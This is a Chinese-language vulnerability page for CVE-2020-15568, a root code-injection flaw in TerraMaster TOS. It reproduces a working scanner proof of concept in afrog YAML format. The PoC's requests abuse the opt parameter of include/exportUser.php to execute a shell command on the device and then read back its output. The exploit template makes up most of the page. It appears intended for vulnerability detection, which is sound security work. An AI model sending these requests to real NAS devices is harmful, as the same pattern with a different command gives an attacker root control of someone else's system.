CVE-2020-15568: TerraMaster TOS v4.1.24 RCE

日期: 2025-09-01 | 影响软件: TerraMaster TOS | POC: 已公开

漏洞描述

TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.

PoC代码[已公开]

id: CVE-2020-15568

info:
  name: TerraMaster TOS v4.1.24 RCE
  author: pikpikcu
  severity: critical
  description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
  reference: 
        - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/

set:
    r1: randomLowercase(10)
    r2: randomInt(800000000, 1000000000)
    r3: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            method: GET
            path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20{{r2}}%20%2B%20{{r3}})%3E{{r1}}
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /include/{{r1}}
        expression: response.status == 200 && response.body.bcontains(bytes(string(r2 + r3)))
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-15568.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-28185: TerraMaster TOS 用户枚举漏洞 POC

CVE-2020-28187: TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187 POC

CVE-2022-24990: TerraMaster TOS 信息泄漏漏洞 CVE-2022-24990 POC

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC